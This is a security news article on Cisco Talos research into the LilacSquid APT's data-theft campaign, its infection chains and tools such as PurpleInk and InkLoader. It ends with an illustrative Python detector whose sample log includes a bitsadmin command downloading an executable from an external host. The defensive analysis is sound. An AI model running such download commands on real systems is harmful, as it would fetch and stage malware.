
Researchers Discover a New Data Theft Campaign by ‘LilacSquid’ APT


In a recent development, researchers at Cisco Talos have uncovered a new data theft campaign conducted by an advanced persistent threat (APT) actor known as “LilacSquid.” This insidious campaign has been active since at least 2021 and has targeted a wide range of industries across different regions, including IT organizations in the United States, energy companies in Europe, and pharmaceutical firms in Asia. The strategic victimology of LilacSquid indicates that it is indifferent to specific industry sectors, with the primary goal of stealing valuable data from diverse sources.

The LilacSquid campaign combines open-source tools with customized malware. Its main implants are MeshAgent, an open-source remote management tool, and PurpleInk, a modified version of QuasarRAT, which are deployed after the actor compromises vulnerable application servers exposed to the internet. Initial access comes either from exploiting vulnerabilities in these public-facing servers or from compromised Remote Desktop Protocol (RDP) credentials; LilacSquid then deploys a mix of open-source tools and customized malware, including MeshAgent, SSF, PurpleInk, and loaders such as InkBox and InkLoader.

One of the key strategies employed by LilacSquid is to establish long-term access within compromised organizations to facilitate the theft of valuable data. Researchers at Talos have confidently stated that LilacSquid has been operational since at least 2021, focusing on infiltrating organizations across Asia, Europe, and the United States in sectors such as pharmaceuticals, oil and gas, and technology. The campaign utilizes two primary infection chains: exploiting vulnerable web applications and utilizing compromised RDP credentials to gain access.

Once a system is compromised, LilacSquid deploys a range of access tools, including MeshAgent, SSF, InkLoader, and PurpleInk. MeshAgent, which is downloaded using the bitsadmin utility, connects to the command and control (C2) server, performs reconnaissance, and activates other malicious implants. On the other hand, InkLoader, a .NET-based malware loader, is utilized when RDP credentials are compromised, persisting across reboots and executing PurpleInk to further the infection chain tailored for remote desktop sessions.
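As an added illustration, not code from the article or from Cisco Talos, the following Python scorer flags the bitsadmin download pattern described above when run over constructed process-creation log lines; the "user|parent|command line" log format, the list of web-server parent processes, and the scoring threshold are assumptions for this example.

```python
import re

# Constructed sample process-creation log lines (not from the article or the
# Talos report). Simplified format: "user|parent process|command line".
SAMPLE_LOGS = [
    "svc_web|w3wp.exe|bitsadmin.exe /transfer job1 /download /priority high "
    "http://203.0.113.10/agent.exe C:\\ProgramData\\agent.exe",
    "alice|explorer.exe|bitsadmin.exe /list",
    "bob|cmd.exe|bitsadmin.exe /transfer upd /download "
    "https://updates.example.internal/patch.msi C:\\Temp\\patch.msi",
    "svc_web|w3wp.exe|whoami.exe",
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
EXEC_EXT = (".exe", ".dll", ".msi", ".ps1", ".bat", ".vbs", ".js")
# Assumed list: web-server worker processes that should rarely spawn a downloader.
SUSPICIOUS_PARENTS = {"w3wp.exe", "httpd.exe", "tomcat.exe", "java.exe"}


def parse_line(line):
    user, parent, cmdline = line.split("|", 2)
    return {"user": user, "parent": parent.lower(), "cmdline": cmdline}


def score_bitsadmin(event):
    """Return (score, reasons) for one process-creation event."""
    cmd = event["cmdline"]
    reasons = []
    if not cmd.lower().startswith("bitsadmin"):
        return 0, reasons
    if "/transfer" in cmd.lower():
        reasons.append("bitsadmin /transfer job")
    if URL_RE.search(cmd):
        reasons.append("remote URL in command line")
    dest = cmd.split()[-1].lower()
    if dest.endswith(EXEC_EXT):
        reasons.append(f"executable destination {dest}")
    if event["parent"] in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by web server process {event['parent']}")
    return len(reasons), reasons


def detect(lines, threshold=4):
    """Return (command line, reasons) for events whose score reaches the threshold."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        score, reasons = score_bitsadmin(ev)
        if score >= threshold:
            hits.append((ev["cmdline"], reasons))
    return hits
```

A routine internal download (the third sample line) scores below the threshold, while a download of an executable from an external host spawned by a web-server worker reaches it.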

PurpleInk, a customized version of QuasarRAT used by LilacSquid, has undergone extensive customization since 2021. This customized malware features robust remote access capabilities, including process enumeration, file manipulation, system information gathering, remote shell access, and proxy server communication. Additionally, LilacSquid has modularized the infection chain since 2023, with PurpleInk running as a separate process via InkLoader.

The tactics and procedures employed by LilacSquid show parallels with North Korean APT groups such as Andariel and Lazarus. Andariel is known to use MeshAgent to maintain post-compromise access, while Lazarus extensively deploys SOCKS proxy and tunneling tools along with custom malware for secondary access and data exfiltration. Similarly, LilacSquid uses SSF and other malware to create tunnels to remote servers.

The LilacSquid campaign exemplifies the ongoing threat posed by sophisticated APT actors who continuously evolve their tactics. By combining open-source tools with customized malware, LilacSquid infiltrates organizations worldwide and maintains long-term access to them. By detecting the indicators of compromise (IoCs) associated with PurpleInk infections, organizations can strengthen their defenses against the pervasive threat posed by LilacSquid.
